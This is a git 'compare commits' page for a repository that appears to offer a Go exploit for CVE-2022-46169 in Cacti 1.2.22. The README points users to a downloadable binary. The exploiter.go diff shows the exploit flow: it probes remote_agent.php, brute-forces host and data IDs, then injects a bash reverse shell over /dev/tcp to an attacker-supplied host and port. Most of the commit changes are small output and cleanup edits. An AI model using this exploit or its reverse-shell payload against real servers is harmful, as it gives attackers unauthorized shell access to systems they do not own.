Vomitblood/cve-2022-46169
1
0
Fork 0
Code Issues Pull requests Packages Projects Releases 3 Wiki Activity

Compare commits

base: Vomitblood:1.0.0
Branches Tags
Vomitblood:main
Vomitblood:3.0.0
Vomitblood:2.0.0
Vomitblood:1.0.0
..
compare: Vomitblood:main
Branches Tags
Vomitblood:main
Vomitblood:3.0.0
Vomitblood:2.0.0
Vomitblood:1.0.0

4 commits
1.0.0 ... main

Author SHA1 Message Date
Vomitblood 788124d44f updated readme 2025-01-25 02:13:26 +08:00
Vomitblood cf0d3444e8 tidy 2025-01-24 11:42:39 +08:00
Vomitblood d9c3670e96 exit after exploit finishes 2025-01-24 11:40:04 +08:00
Vomitblood d24b8acd21 fixed text outputs 2025-01-24 11:33:53 +08:00
2 changed files with 9 additions and 4 deletions
Show stats Expand all files Collapse all files

4
README.md
View file

@ -1,5 +1,9 @@
# CVE-2022-46169 # CVE-2022-46169
# Usage
Download the binary from the [latest release](https://git.vomitblood.com/Vomitblood/cve-2022-46169/releases).
For Cacti 1.2.22. For Cacti 1.2.22.
Written in Go. Written in Go.
Credits to [ruycr4ft](https://github.com/ruycr4ft/CVE-2022-46169). Credits to [ruycr4ft](https://github.com/ruycr4ft/CVE-2022-46169).

9
internal/exploiter/exploiter.go
View file

@ -106,14 +106,15 @@ func reverseShell(payload string, vulnUrl string, hostID int, dataIDs int) {
fmt.Println("Error making request:", err) fmt.Println("Error making request:", err)
return return
} }
defer resp.Body.Close()
resp.Body.Close()
} }
func Exploit(urlTarget string, lhost string, lport string) { func Exploit(urlTarget string, lhost string, lport string) {
vulnURL := urlTarget + "/remote_agent.php" vulnURL := urlTarget + "/remote_agent.php"
fmt.Println("Checking...") fmt.Println("Checking for vulnerability...")
if checkVuln(vulnURL) { if checkVuln(vulnURL) {
fmt.Println("The target is vulnerable. Exploiting...") fmt.Println("The target is vulnerable. Bruteforcing...")
fmt.Println("Bruteforcing the host_id and local_data_ids") fmt.Println("Bruteforcing the host_id and local_data_ids")
isVuln, hostID, dataIDs := bruteForcing(vulnURL) isVuln, hostID, dataIDs := bruteForcing(vulnURL)
@ -122,7 +123,7 @@ func Exploit(urlTarget string, lhost string, lport string) {
payload := fmt.Sprintf("bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'", lhost, lport) payload := fmt.Sprintf("bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'", lhost, lport)
reverseShell(payload, vulnURL, hostID, dataIDs) reverseShell(payload, vulnURL, hostID, dataIDs)
} else { } else {
fmt.Println("The Bruteforce Failed...") fmt.Println("The bruteforce failed...")
} }
} else { } else {
fmt.Println("The target is not vulnerable") fmt.Println("The target is not vulnerable")